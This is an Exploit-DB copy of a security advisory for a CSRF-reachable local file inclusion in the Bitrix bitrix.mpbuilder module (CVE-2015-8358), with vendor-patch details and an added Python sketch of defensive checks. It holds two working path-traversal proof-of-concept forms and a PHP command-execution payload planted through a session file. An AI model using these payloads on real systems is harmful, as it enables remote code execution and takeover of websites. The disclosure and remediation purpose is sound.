Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion
2015-12-14T00:00:00
ID: EDB-ID:38975 | Type: exploitdb | Reporter: High-Tech Bridge SA | Modified: 2015-12-14T00:00:00
Description
Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion. CVE-2015-8358. Webapps exploit for php platform
Advisory ID: HTB23281
Product: bitrix.mpbuilder Bitrix module
Vendor: www.1c-bitrix.ru
Vulnerable Version(s): 1.0.10 and probably prior
Tested Version: 1.0.10
Advisory Publication: November 18, 2015 [without technical details]
Vendor Notification: November 18, 2015
Vendor Patch: November 25, 2015
Public Disclosure: December 9, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8358
Risk Level: Critical
CVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a vulnerability in the bitrix.mpbuilder Bitrix module which can be exploited to include and execute an arbitrary PHP file on the target system with the privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website.
Access to the vulnerable module requires administrative privileges; however, the vulnerability can be exploited by anonymous users via a CSRF vector, since the affected admin script accepts the state-changing POST without a request-specific token.
The vulnerability exists due to insufficient filtering of the "work[]" HTTP POST parameter in the "/bitrix/admin/bitrix.mpbuilder_step2.php" script before it is used to build a path passed to the include() PHP function. Because the array key is used as part of the path, a key containing "../" sequences escapes the intended directory, and a remote attacker can include and execute an arbitrary local file on the target system.
The simple exploit below includes and executes the file "/tmp/file":
<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog" method="post" name="main">
<input type="hidden" name="save" value="1">
<input type="hidden" name="work[/../../../../../../../../../../../../../../../../../../tmp/file]" value="1">
<input value="submit" id="btn" type="submit" />
</form>
In a real-world scenario an attacker can use PHP session files to execute arbitrary PHP code, since session data is written to disk under a predictable name and the included file is parsed as PHP. For example, an attacker can change the name in his profile to <? exec($_POST['cmd']); ?> and create a CSRF exploit that passes arbitrary commands and executes them on the system. The PoC code below executes the /bin/ls command using a previously created session file containing the malicious "NAME" value:
<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog" method="post" name="main">
<input type="hidden" name="save" value="1">
<input type="hidden" name="work[/../../../../../../../../../../../../../../../../../../tmp/sess_[SESSION_ID]]" value="1">
<input type="hidden" name="cmd" value="ls">
<input value="submit" id="btn" type="submit" />
</form>
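As an added illustration that is not part of the advisory or of the vendor's PHP code, the following Python sketches the two checks whose absence the advisory describes: an allowlist on "work[]" array keys plus canonical-path containment before the include, and a per-session token that closes the CSRF route to the admin script. The modules directory, the identifier regex and the "include.php" filename are assumptions made for the example.

```python
import hmac
import os
import re
from typing import Dict, List, Optional, Tuple

# Assumption: a Bitrix module identifier is a plain dotted token such as
# "blog" or "bitrix.mpbuilder". Anything else never reaches include().
MODULE_KEY_RE = re.compile(r"[a-z0-9_]+(\.[a-z0-9_]+)*")

# Constructed path standing in for the directory the module includes from.
MODULES_DIR = "/var/www/html/bitrix/modules"


def is_valid_module_key(key: str) -> bool:
    """Allowlist check for one work[<key>] array key.

    Rejects path separators, '..' segments, brackets and NUL bytes, so the
    traversal keys shown in the advisory fail here before any path is built.
    """
    return MODULE_KEY_RE.fullmatch(key) is not None


def resolve_module_path(key: str, modules_dir: str = MODULES_DIR) -> Optional[str]:
    """Return the canonical file path for a module key, or None if unsafe.

    Defence in depth: even after the allowlist, canonicalise the joined path
    and confirm it is still inside modules_dir before handing it to include().
    The real module builds a different path; "<key>/include.php" is an
    assumption for this example.
    """
    if not is_valid_module_key(key):
        return None
    base = os.path.realpath(modules_dir)
    candidate = os.path.realpath(os.path.join(base, key, "include.php"))
    # commonpath equals base only when candidate lies under modules_dir.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def filter_work_param(work: Dict[str, str]) -> Tuple[List[str], List[str]]:
    """Split a posted work[] array into keys to process and keys to reject.

    Mirrors the PHP side, where $_POST['work'] arrives as an associative
    array whose *keys* are the attacker-controlled module names.
    """
    accepted: List[str] = []
    rejected: List[str] = []
    for key in work:
        (accepted if resolve_module_path(key) else rejected).append(key)
    return accepted, rejected


def csrf_token_valid(session_token: str, posted_token: Optional[str]) -> bool:
    """State-changing admin requests must carry a per-session token.

    Comparing the posted value against the token stored server-side (in
    constant time) is what removes the CSRF vector the advisory describes:
    a third-party page cannot read the token, so its auto-submitted form fails.
    """
    if not posted_token or not session_token:
        return False
    return hmac.compare_digest(session_token, posted_token)


if __name__ == "__main__":
    # Constructed work[] array: one legitimate key and the two PoC keys above.
    posted_work = {
        "blog": "1",
        "/../../../../../../../../../../../../../../../../../../tmp/file": "1",
        "/../../../../../../../../../../../../../../../../../../tmp/sess_[SESSION_ID]": "1",
    }
    ok, bad = filter_work_param(posted_work)
    print("accepted:", ok)
    print("rejected:", bad)
```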
-----------------------------------------------------------------------------------------------
Solution:
Update to bitrix.mpbuilder module 1.0.12
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23281 - https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in bitrix.mpbuilder Bitrix module
[2] bitrix.mpbuilder - https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module for software developers.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.